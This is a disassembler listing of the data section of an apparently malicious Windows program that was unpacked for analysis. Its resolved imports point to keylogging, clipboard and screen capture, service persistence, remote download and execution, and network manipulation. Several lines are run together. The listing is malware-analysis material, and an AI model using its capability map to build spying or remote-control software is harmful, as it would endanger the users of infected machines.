dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_43A9E8 dd 0C0000005h ; sub_41D01C+A�r ...
dword_43A9EC dd 0Bh dd 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_43AA60 dd 3 ; sub_41FB6B+C8�r
dword_43AA64 dd 7 ; sub_41FB6B+CD�r
dword_43AA68 dd 0Ah ; sub_41FC98+4�r
dword_43AA6C dd 8Ch ; sub_41CEDB+8F�w ...
dword_43AA70 dd 0FFFFFFFFh, 0A00h ; sub_41C178:loc_41C1F9�o
dword_43AA78 dd 2 ; sub_41D7B5+28�r
off_43AA7C dd offset aR6002FloatingP ; DATA XREF: sub_41D7B5+FC�r
; sub_41D7B5+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 421AF4h, 9, 421AC8h, 0Ah, 421AA4h, 10h, 421A78h
dd 11h, 421A48h, 12h, 421A24h, 13h, 4219F8h, 18h, 4219C0h
dd 19h, 421998h, 1Ah, 421960h, 1Bh, 421928h, 1Ch, 421900h
dd 78h, 4218F0h, 79h, 4218E0h, 7Ah, 4218D0h, 0FCh, 426A30h
dd 0FFh, 4218C0h
off_43AB08 dd offset dword_46BE00 ; DATA XREF: sub_41D7B5+1B�o
; sub_41D972+55�o
dd 0
dd offset dword_46BE00
dd 101h
dword_43AB18 dd 0FFFFFFFFh, 0 dd 1000h, 0
dword_43AB28 dd 3 dup(0) ; sub_4187D6+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_43AB48 dd 3 dup(0) ; sub_4187D6:loc_4187F4�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_43AB78 dd 84h dup(0) dword_43AD88 dd 2694h ; sub_419EDC+46�r ...
align 10h
dword_43AD90 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_43ADA8 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fhdword_43ADC0 dd 7080h ; sub_41EA02+5E�w ...
dword_43ADC4 dd 1 ; sub_41EA02+8B�w ...
dword_43ADC8 dd 0FFFFF1F0h ; sub_41EA02+94�w ...
dword_43ADCC dd 545350h, 0Fh dup(0)dword_43AE0C dd 544450h, 0Fh dup(0)off_43AE4C dd offset dword_43ADCC ; DATA XREF: sub_41EA02+BA�r
; sub_41EA02+D9�r ...
off_43AE50 dd offset dword_43AE0C ; DATA XREF: sub_41EA02+F4�r
; sub_41EA02+11B�r ...
align 8
dword_43AE58 dd 0FFFFFFFFh ; sub_41EC60+1E�r ...
dword_43AE5C dd 0 ; sub_41EE0C+BF�w
dword_43AE60 dd 0 ; sub_41EE0C+E0�w
align 8
dword_43AE68 dd 0FFFFFFFFh ; sub_41EC60+26�r ...
dword_43AE6C dd 0 ; sub_41EE0C+EA�w ...
dword_43AE70 dd 0 ; sub_41EE0C+23�r ...
dword_43AE74 dd 0FFFFFFFFh dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_43AEA4 dd 16Dh ; sub_41EE0C+2E�r ...
dword_43AEA8 dd 0FFFFFFFFh dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_43AEE0 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_43B040 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_41FFF0+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
off_43B1A0 dd offset off_421CE8 ; DATA XREF: .text:off_421D10�o
; .text:00421E3C�o ...
align 8
a_?avexception@ db '.?AVexception@@',0
off_43B1B8 dd offset off_421CE8 ; DATA XREF: .text:off_421D28�o
; .text:00421DBC�o ...
align 10h
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_43B1D8 dd offset off_421CE8 ; DATA XREF: .text:off_421D40�o
; .text:00421D84�o ...
align 10h
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_43B1F8 dd offset off_421CE8 ; DATA XREF: .text:off_421DC8�o
; .text:00421E0C�o ...
align 10h
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_43B218 dd offset off_421CE8 ; DATA XREF: .text:off_421E48�o
; .text:00421E84�o
align 10h
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset sub_41E79E
align 8
byte_43B238 db 0 ; DATA XREF: sub_401444+1C1�w
; sub_401444+2C0�o
align 2
word_43B23A dw 0 ; DATA XREF: sub_401444+1D1�w
word_43B23C dw 0 ; DATA XREF: sub_401444+1D7�w
word_43B23E dw 0 ; DATA XREF: sub_401444+1DE�w
byte_43B240 db 0 ; DATA XREF: sub_401444+1E5�w
byte_43B241 db 0 ; DATA XREF: sub_401444+1EC�w
word_43B242 dw 0 ; DATA XREF: sub_401444+1F2�w
dword_43B244 dd 0 ; sub_401444+23E�w
dword_43B248 dd 0 byte_43B24C db 0 ; DATA XREF: sub_401444+258�w
byte_43B24D db 0 ; DATA XREF: sub_401444+26B�w
word_43B24E dw 0 ; DATA XREF: sub_401444+283�w
word_43B250 dw 0 ; DATA XREF: sub_401444+292�w
word_43B252 dw 0 ; DATA XREF: sub_401444+28A�w
dword_43B254 dd 100h dup(0) dword_43B654 dd 0 byte_43B658 db 0 ; DATA XREF: sub_402FCD+36�r
; sub_4030B0+37�r ...
align 4
dword_43B65C dd 0 ; sub_4036D2+30�r ...
dword_43B660 dd 2 dup(0) dword_43B668 dd 0 ; sub_40CD3A+5B16�o ...
dword_43B66C dd 0 ; sub_40597F+51�r ...
dword_43B670 dd 0 ; .text:0040491B�r ...
align 8
dword_43B678 dd 0 ; sub_407592+92�w ...
dword_43B67C dd 0 ; sub_4078DF+D9�w ...
dd 256h dup(0)
dword_43BFD8 dd 6 dup(0) ; sub_4076CB+129�o ...
dword_43BFF0 dd 0 ; sub_4071B6+FF�o
dword_43BFF4 dd 41h dup(0) dword_43C0F8 dd 41h dup(0) dword_43C1FC dd 0 ; sub_4071B6+111�r
dword_43C200 dd 0 dword_43C204 dd 0 ; sub_4071B6+D2�r
dword_43C208 dd 20h dup(0) ; sub_4071B6+B7�o
dword_43C288 dd 0 dword_43C28C dd 0 ; sub_4071B6+C1�w
dword_43C290 dd 0 align 8
dword_43C298 dd 0 ; sub_4071B6+32E�o
dword_43C29C dd 0A2h dup(0) dword_43C524 dd 41h dup(0) dword_43C628 dd 0 ; sub_4071B6+2E1�r
align 10h
dword_43C630 dd 0 ; sub_4071B6+340�r
dword_43C634 dd 0 dword_43C638 dd 0 dword_43C63C dd 0 dd 0
dword_43C644 dd 0 dword_43C648 dd 0 ; sub_4071B6+222�o
dword_43C64C dd 41h dup(0) dword_43C750 dd 41h dup(0) dword_43C854 dd 0 ; sub_4071B6+234�r
dword_43C858 dd 0 dword_43C85C dd 0 dword_43C860 dd 20h dup(0) ; sub_4071B6+1DA�o
dword_43C8E0 dd 0 dword_43C8E4 dd 0 ; sub_4071B6+1E4�w
dword_43C8E8 dd 0 dword_43C8EC dd 0 ; resolved to->GDI32.DeleteDC ; sub_40891C+4CD�r
dword_43C8F0 dd 0 ; resolved to->KERNEL32.Module32First ; sub_413C50+EE�r
dword_43C8F4 dd 0 ; resolved to->WININET.InternetGetConnectedStateExA ; sub_40891C+862�r ...
dword_43C8F8 dd 0 ; sub_40891C+A18�r ...
dword_43C8FC dd 0 ; sub_40891C+9E8�r ...
dword_43C900 dd 0 ; resolved to->GDI32.SelectObject ; sub_40891C+4BD�r
dword_43C904 dd 0 ; resolved to->USER32.GetKeyState ; sub_4021FB+108�r ...
dword_43C908 dd 0 ; sub_40891C+A10�r ...
dword_43C90C dd 0 ; resolved to->ADVAPI32.OpenServiceA ; sub_40891C+3A9�r ...
dword_43C910 dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_40A9D8+11E�r
dword_43C914 dd 0 ; resolved to->ADVAPI32.StartServiceA ; sub_40891C+3B1�r ...
dword_43C918 dd 0 ; resolved to->ADVAPI32.IsValidSecurityDescriptor ; sub_413248+AD�r
dword_43C91C dd 0 ; resolved to->WS2_32.__WSAFDIsSet ; sub_40840A+76�r ...
dword_43C920 dd 0 ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_40891C+D2�r ...
dword_43C924 dd 0 ; sub_40891C+9DB�r ...
dword_43C928 dd 0 ; resolved to->ADVAPI32.CloseServiceHandle ; sub_40891C+3C9�r ...
dword_43C92C dd 0 ; resolved to->WININET.InternetCrackUrlA ; sub_40891C+88E�r ...
dword_43C930 dd 0 ; resolved to->ADVAPI32.RegQueryValueExA ; sub_40891C+2A5�w ...
dword_43C934 dd 0 ; resolved to->WININET.InternetOpenUrlA ; sub_40891C+886�r ...
dword_43C938 dd 0 ; resolved to->KERNEL32.QueryPerformanceFrequencydword_43C93C dd 0 ; resolved to->WININET.InternetReadFile ; sub_40891C+896�r ...
dword_43C940 dd 0 ; resolved to->WS2_32.WSAAsyncSelect ; sub_40891C+52F�w ...
dword_43C944 dd 0 ; resolved to->KERNEL32.Process32Next ; sub_40891C+CA�r ...
dword_43C948 dd 0 ; resolved to->IPHLPAPI.IcmpSendEcho ; sub_40A133+11A�r
dword_43C94C dd 0 ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_40891C+A6D�r ...
dword_43C950 dd 0 ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_40891C+F2�r
dword_43C954 dd 0 ; resolved to->GDI32.GetDIBColorTable ; sub_40891C+4B5�r
dword_43C958 dd 0 ; resolved to->WS2_32.ntohl ; sub_40891C+5D8�w ...
dword_43C95C dd 0 ; sub_40891C+A08�r
dword_43C960 dd 0 ; resolved to->WS2_32.ntohs ; sub_40891C+5CB�w ...
dword_43C964 dd 0 ; sub_40891C+B21�w
dword_43C968 dd 0 ; resolved to->WININET.InternetGetConnectedState ; sub_40891C+84F�r ...
dword_43C96C dd 0 ; resolved to->USER32.ExitWindowsEx ; sub_409D12+15�r
dword_43C970 dd 0 ; sub_40891C+9F0�r ...
dword_43C974 dd 0 ; resolved to->ADVAPI32.ControlService ; sub_40891C+3B9�r ...
dword_43C978 dd 0 ; resolved to->ADVAPI32.DeleteService ; sub_40891C+3C1�r ...
dword_43C97C dd 0 ; sub_40891C+C5D�r
dword_43C980 dd 0 ; resolved to->WS2_32.getpeernamedword_43C984 dd 0 ; resolved to->WS2_32.WSACleanup ; sub_4018CB:loc_401B47�r ...
dword_43C988 dd 0 ; resolved to->GDI32.DeleteObjectdword_43C98C dd 0 ; sub_40891C+A20�r ...
dword_43C990 dd 0 ; resolved to->ADVAPI32.RegDeleteValueA ; sub_40891C+2DE�r ...
dword_43C994 dd 0 ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_40891C+DA�r ...
dword_43C998 dd 0 ; resolved to->SHELL32.ShellExecuteA ; sub_40891C+B75�r ...
dword_43C99C dd 0 ; resolved to->WS2_32.WSAStartup ; sub_4018CB+2F�r ...
dword_43C9A0 dd 0 ; resolved to->WININET.HttpSendRequestA ; sub_40891C+872�r ...
dword_43C9A4 dd 0 ; sub_40891C+9F8�r
dword_43C9A8 dd 0 ; sub_404EC7+6E�r ...
dword_43C9AC dd 0 ; resolved to->USER32.GetForegroundWindow ; sub_4021FB+63�r ...
dword_43C9B0 dd 0 ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_40891C+910�r ...
dword_43C9B4 dd 0 dword_43C9B8 dd 0 ; resolved to->WS2_32.WSAGetLastError ; sub_401444+3C�r ...
dword_43C9BC dd 0 ; resolved to->WININET.InternetOpenA ; sub_40891C+855�r
dword_43C9C0 dd 0 ; resolved to->USER32.GetWindowTextA ; sub_4021FB+78�r ...
dword_43C9C4 dd 0 ; resolved to->USER32.IsWindow ; sub_40891C+1C2�r
dword_43C9C8 dd 0 ; resolved to->WS2_32.getsockname ; sub_40891C+786�r ...
dword_43C9CC dd 0 ; resolved to->WS2_32.connect ; sub_4036D2+5E�r ...
dword_43C9D0 dd 0 ; resolved to->WS2_32.WSAIoctl ; sub_40891C+549�w ...
dword_43C9D4 dd 0 ; sub_40891C:loc_4091F7�w ...
dword_43C9D8 dd 0 ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_40891C+2C6�r ...
dword_43C9DC dd 0 ; resolved to->WS2_32.gethostbyaddr ; sub_40891C+681�w ...
dword_43C9E0 dd 0 ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_40891C+323�r ...
dword_43C9E4 dd 0 ; resolved to->ADVAPI32.EnumServicesStatusA ; sub_40891C+3D1�r ...
dword_43C9E8 dd 0 ; sub_404EC7+1A0�r ...
dword_43C9EC dd 0 ; resolved to->WININET.HttpOpenRequestA ; sub_40891C+86A�r ...
dword_43C9F0 dd 0 ; resolved to->USER32.GetAsyncKeyState ; sub_40891C+206�w ...
dword_43C9F4 dd 0 ; resolved to->USER32.OpenClipboard ; sub_40891C+1D2�r ...
dword_43C9F8 dd 0 ; resolved to->WININET.InternetConnectA ; sub_40891C+87A�r ...
dword_43C9FC dd 0 ; resolved to->WSOCK32.recvfrom ; sub_40891C+606�w ...
dword_43CA00 dd 0 ; resolved to->ADVAPI32.RegCloseKey ; sub_40891C+2BF�w ...
dword_43CA04 dd 0 ; resolved to->WSOCK32.setsockopt ; sub_401444+AA�r ...
dword_43CA08 dd 0 ; resolved to->ADVAPI32.OpenProcessToken ; sub_40891C+316�r ...
dword_43CA0C dd 0 ; resolved to->WS2_32.select ; sub_406B84+1FC�r ...
dword_43CA10 dd 0 ; resolved to->GDI32.CreateDCA ; sub_40891C+490�r
dword_43CA14 dd 0 ; resolved to->USER32.GetClipboardData ; sub_40891C+1DA�r ...
dword_43CA18 dd 0 ; resolved to->ADVAPI32.OpenSCManagerA ; sub_40891C+39C�r ...
dword_43CA1C dd 0 ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_Adword_43CA20 dd 0 ; resolved to->WS2_32.ntohl ; sub_4010B2+1F9�r ...
dword_43CA24 dd 0 ; resolved to->WS2_32.ntohs ; sub_4010B2+9D�r ...
dword_43CA28 dd 0 ; resolved to->KERNEL32.Process32First ; sub_40891C+C2�r ...
dword_43CA2C dd 0 ; resolved to->GDI32.GetDeviceCaps ; sub_40891C+4AD�r
dword_43CA30 dd 0 ; resolved to->USER32.FindWindowA ; sub_40891C+1BA�r ...
dword_43CA34 dd 0 ; sub_413B27+72�r
dword_43CA38 dd 0 ; resolved to->WS2_32.gethostname ; sub_40891C+78E�r
dword_43CA3C dd 0 ; resolved to->WSOCK32.recv ; sub_4033B6+23B�r ...
dword_43CA40 dd 0 ; sub_404EC7+21D�r ...
dword_43CA44 dd 0 ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_40891C+BA�r ...
dword_43CA48 dd 0 ; resolved to->ADVAPI32.RegSetValueExA ; sub_40891C+2CE�r ...
dword_43CA4C dd 0 ; resolved to->WS2_32.listen ; sub_407B36+9C�r ...
dword_43CA50 dd 0 ; resolved to->WS2_32.bind ; sub_405A96+89�r ...
dword_43CA54 dd 0 dword_43CA58 dd 0 ; resolved to->WININET.InternetCloseHandle ; sub_40AD52+209�r ...
dword_43CA5C dd 0 dword_43CA60 dd 0 ; sub_40891C+BB8�w ...
dword_43CA64 dd 0 ; resolved to->WS2_32.inet_addr ; sub_401444+1A0�r ...
dword_43CA68 dd 0 ; resolved to->GDI32.CreateDIBSection ; sub_40891C+49D�r
dword_43CA6C dd 0 ; resolved to->GDI32.BitBlt ; sub_40891C+4C5�r
dword_43CA70 dd 0 ; resolved to->GDI32.CreateCompatibleDC ; sub_40891C+4A5�r
dword_43CA74 dd 0 ; resolved to->WS2_32.send ; sub_4033B6+249�r ...
dword_43CA78 dd 0 ; resolved to->USER32.CloseClipboard ; sub_40891C+1E2�r ...
dword_43CA7C dd 0 ; sub_40891C+A28�r ...
dword_43CA80 dd 0 ; resolved to->USER32.SendMessageA ; sub_40891C+1AD�r ...
dword_43CA84 dd 0 ; resolved to->KERNEL32.GetDriveTypeA ; sub_40891C+E2�r ...
dword_43CA88 dd 0 ; resolved to->WS2_32.sendto ; sub_401444+2C8�r ...
dword_43CA8C dd 0 ; sub_40891C+B30�r
dword_43CA90 dd 0 ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_413BE5+55�r
dword_43CA94 dd 0 ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_40891C+27E�w ...
dword_43CA98 dd 0 ; resolved to->SHELL32.SHChangeNotifydword_43CA9C dd 0 ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_409FB2+8F�r
dword_43CAA0 dd 0 ; resolved to->IPHLPAPI.GetIpNetTable ; sub_40891C+AB7�r ...
dword_43CAA4 dd 0 ; resolved to->WS2_32.socket ; sub_401BD4+55�r ...
dword_43CAA8 dd 0 ; resolved to->WS2_32.gethostbyname ; sub_40891C+674�w ...
dword_43CAAC dd 0 ; sub_40891C+BC5�w ...
dword_43CAB0 dd 0 ; resolved to->WS2_32.inet_ntoa ; sub_406B84+250�r ...
dword_43CAB4 dd 0 ; sub_40891C+A00�r ...
dword_43CAB8 dd 0 ; resolved to->WS2_32.accept ; sub_407B36+B3�r ...
dword_43CABC dd 0 ; resolved to->WS2_32.closesocket ; sub_401444+2F4�r ...
dword_43CAC0 dd 0 ; resolved to->WS2_32.ioctlsocket ; sub_405A96+376�r ...
dword_43CAC4 dd 0 ; sub_402FCD+C8�r ...
dword_43CAC8 dd 0 ; resolved to->WS2_32.WSASocketA ; sub_4018CB+4F�r ...
dword_43CACC dd 0 ; sub_40891C+B1B�r
dword_43CAD0 dd 0 ; resolved to->KERNEL32.SetErrorMode ; sub_40891C+AD�r ...
dword_43CAD4 dd 0 ; resolved to->USER32.DestroyWindow ; sub_40891C+1CA�r
dword_43CAD8 dd 0 ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_40891C+91D�r ...
dword_43CADC dd 0 ; resolved to->KERNEL32.SearchPathA ; sub_40891C+EA�r ...
dword_43CAE0 dd 0 ; sub_40891C+12B�w ...
dword_43CAE4 dd 0 ; sub_4095A9+1C�r
dword_43CAE8 dd 0 ; sub_40891C:loc_408B71�w ...
dword_43CAEC dd 0 ; sub_4095A9+50�r
dword_43CAF0 dd 0 ; sub_40891C:loc_408C4B�w ...
dword_43CAF4 dd 0 ; sub_4095A9+84�r
dword_43CAF8 dd 0 ; sub_4095A9:loc_409659�r
dword_43CAFC dd 0 ; sub_4095A9+B8�r
dword_43CB00 dd 0 ; sub_4095A9:loc_40968D�r
dword_43CB04 dd 0 ; sub_4095A9+EC�r
dword_43CB08 dd 0 ; sub_40891C+8D1�w ...
dword_43CB0C dd 0 ; sub_4095A9+120�r
dword_43CB10 dd 0 ; sub_4095A9:loc_4096F5�r ...
dword_43CB14 dd 0 ; sub_4095A9+154�r
dword_43CB18 dd 0 ; sub_4095A9:loc_409729�r ...
dword_43CB1C dd 0 ; sub_4095A9+188�r
dword_43CB20 dd 0 ; sub_4095A9:loc_40975D�r
dword_43CB24 dd 0 ; sub_4095A9+1BC�r
dword_43CB28 dd 0 ; sub_4095A9:loc_409791�r
dword_43CB2C dd 0 ; sub_4095A9+1F0�r
dword_43CB30 dd 0 ; sub_4095A9:loc_4097C5�r
dword_43CB34 dd 0 ; sub_4095A9+224�r
dword_43CB38 dd 0 ; sub_4095A9:loc_4097F9�r
dword_43CB3C dd 0 ; sub_4095A9+258�r
dword_43CB40 dd 0 ; sub_4095A9:loc_40982D�r
dword_43CB44 dd 0 ; sub_4095A9+28C�r
dword_43CB48 dd 0 ; sub_4095A9:loc_409861�r
dword_43CB4C dd 0 ; sub_4095A9+2C0�r
dword_43CB50 dd 80h dup(0) dword_43CD50 dd 4 dup(0) dword_43CD60 dd 0 ; sub_40A5C5+54�r ...
dword_43CD64 dd 0 ; sub_40A5C5+37�r ...
dword_43CD68 dd 0 ; sub_40A71A+83�o
dword_43CD6C dd 0 ; sub_40A71A+11B�w
dword_43CD70 dd 0Dh dup(0) ; sub_40A71A:loc_40A857�o
dword_43CDA4 dd 0 ; sub_40A5C5+EC�r ...
dword_43CDA8 dd 0Eh dup(0) dword_43CDE0 dd 1000h dup(0) ; sub_40B118�o ...
dword_440DE0 dd 0Dh dup(0) ; sub_40B118+E�o ...
dword_440E14 dd 0 dword_440E18 dd 0 ; sub_40AF80+44�r ...
dd 5 dup(0)
dword_440E30 dd 0 ; sub_40CD3A+B6B�r
dd 2D9h dup(0)
dword_441998 dd 0 ; sub_40AF80+2D�o ...
dd 7Fh dup(0)
dword_441B98 dd 0 ; sub_414F15+3A�w ...
dword_441B9C dd 0 ; sub_4076CB+6D�r ...
dword_441BA0 dd 0 ; sub_414DDA+45�w ...
dword_441BA4 dd 0 ; sub_405A96+7E�w ...
dword_441BA8 dd 0 ; sub_407EA5+53�r ...
dword_441BAC dd 0 ; sub_4071B6+11F�w ...
byte_441BB0 db 0 ; DATA XREF: sub_40CA58+91�o
; sub_40CD3A+318D�r ...
align 4
dd 0EE7h dup(0)
dword_445750 dd 95CEh dup(0) dword_46AE88 dd 0 ; sub_40C574+47�w ...
align 10h
dword_46AE90 dd 0 dword_46AE94 dd 20h dup(0) ; sub_40C574+447�o ...
dword_46AF14 dd 10h dup(0) ; sub_40CD3A+8D4�o
dword_46AF54 dd 24h dup(0) dword_46AFE4 dd 0 ; sub_40C574+45E�w ...
dword_46AFE8 dd 0 dd 2 dup(0)
dword_46AFF4 dd 0 dword_46AFF8 dd 0 ; sub_40CD3A+268�r
byte_46AFFC db 0 ; DATA XREF: sub_40CBBE+28�r
; sub_40CBBE+30�o
byte_46AFFD db 3 dup(0) ; DATA XREF: sub_40282F+9F�o
dword_46B000 dd 0 ; sub_40C574+412�r ...
dword_46B004 dd 0 ; sub_40CD3A+878�r
dword_46B008 dd 18h dup(0) ; sub_412D95+131�o ...
dword_46B068 dd 8 dup(0) ; sub_413B27+A5�o
dword_46B088 dd 0 ; sub_41503B+19�o
dword_46B08C dd 77h dup(0) dword_46B268 dd 0 ; sub_413112+4D�r ...
align 10h
dword_46B270 dd 18h dup(0) ; sub_4139F3+12D�o
dword_46B2D0 dd 80h dup(0) ; sub_413053+7D�o ...
byte_46B4D0 db 0 ; DATA XREF: sub_413112+29�r
; sub_413112+34�w
align 8
dword_46B4D8 dd 80h dup(0) ; sub_413369+88�o ...
dword_46B6D8 dd 80h dup(0) ; sub_412C6C+50�o ...
dword_46B8D8 dd 80h dup(0) byte_46BAD8 db 0 ; DATA XREF: sub_414CD9+64�r
; sub_414CD9+92�w
align 10h
dword_46BAE0 dd 0 align 8
dword_46BAE8 dd 0 ; sub_41697B+A4�w
align 10h
word_46BAF0 dw 0 ; DATA XREF: sub_41697B+55�r
; sub_41697B+9A�o
word_46BAF2 dw 0 ; DATA XREF: sub_41697B+48�r
db 2 dup(0)
word_46BAF6 dw 0 ; DATA XREF: sub_41697B+3B�r
word_46BAF8 dw 0 ; DATA XREF: sub_41697B+2E�r
word_46BAFA dw 0 ; DATA XREF: sub_41697B+21�r
align 10h
dword_46BB00 dd 0 ; sub_416B3F+91�w
dword_46BB04 dd 0 ; sub_416CDE:loc_416D5A�w ...
dword_46BB08 dd 0 ; sub_4185EB:loc_418685�w ...
dword_46BB0C dd 0 dword_46BB10 dd 0A28h dword_46BB14 dd 501h dword_46BB18 dd 5 dword_46BB1C dd 1 dword_46BB20 dd 1 ; sub_41D170+91�w
dword_46BB24 dd 8A1400h ; sub_40C574+307�r ...
dd 0
dword_46BB2C dd 8A1428h ; sub_41FCDD+9�r ...
dword_46BB30 dd 0 dword_46BB34 dd 0 ; sub_4200AB+4�r ...
dd 0
off_46BB3C dd offset aCM_unpackerPac ; DATA XREF: sub_41D170+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_46BB44 db 0 ; DATA XREF: sub_417869+2D�w
; sub_41DA17+5�r
align 4
dword_46BB48 dd 1 dword_46BB4C dd 1 ; sub_417869+8B�w
dword_46BB50 dd 0 ; sub_41D0B7:loc_41D0C9�r ...
align 8
dword_46BB58 dd 0 dword_46BB5C dd 0 dd 0
dword_46BB64 dd 0 ; sub_41737F:loc_41749B�r ...
dword_46BB68 dd 0 dword_46BB6C dd 0 ; sub_419A6F+2D�w ...
dword_46BB70 dd 0 ; sub_41A9A5+1A�r ...
byte_46BB74 db 0 ; DATA XREF: sub_41A8A1+3�r
; sub_41A8A1+98�r ...
align 4
dword_46BB78 dd 0 ; sub_41AA83+21�w ...
byte_46BB7C db 0 ; DATA XREF: sub_41AA83+51�w
align 10h
dword_46BB80 dd 0 ; sub_41B054+3A�r ...
dword_46BB84 dd 0 ; sub_41B054+43�r ...
dword_46BB88 dd 0 ; sub_41AE20+5�r
dword_46BB8C dd 0 dword_46BB90 dd 1 ; sub_41C639+4C�w ...
dd 2 dup(0)
dword_46BB9C dd 0 ; sub_417033+9D�r ...
dd 3 dup(0)
dword_46BBAC dd 0 ; sub_417A19+BF�r ...
dd 0
dword_46BBB4 dd 1 ; sub_41C9F6+4�w ...
dword_46BBB8 dd 0 ; sub_41CEDB+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_41D170:loc_41D187�o
; .text:off_46BB3C�o
align 4
dd 3Ah dup(0)
dword_46BCC0 dd 1 ; sub_41D3BD+23�w ...
dword_46BCC4 dd 0 dword_46BCC8 dd 0 ; sub_4188A0+154�w ...
dword_46BCCC dd 1 ; sub_41DA93:loc_41DAFD�w
dword_46BCD0 dd 0 align 8
word_46BCD8 dw 0 ; DATA XREF: sub_41E67B+1A�o
; sub_41E67B+46�r
byte_46BCDA db 0 ; DATA XREF: sub_41E67B+39�r
align 4
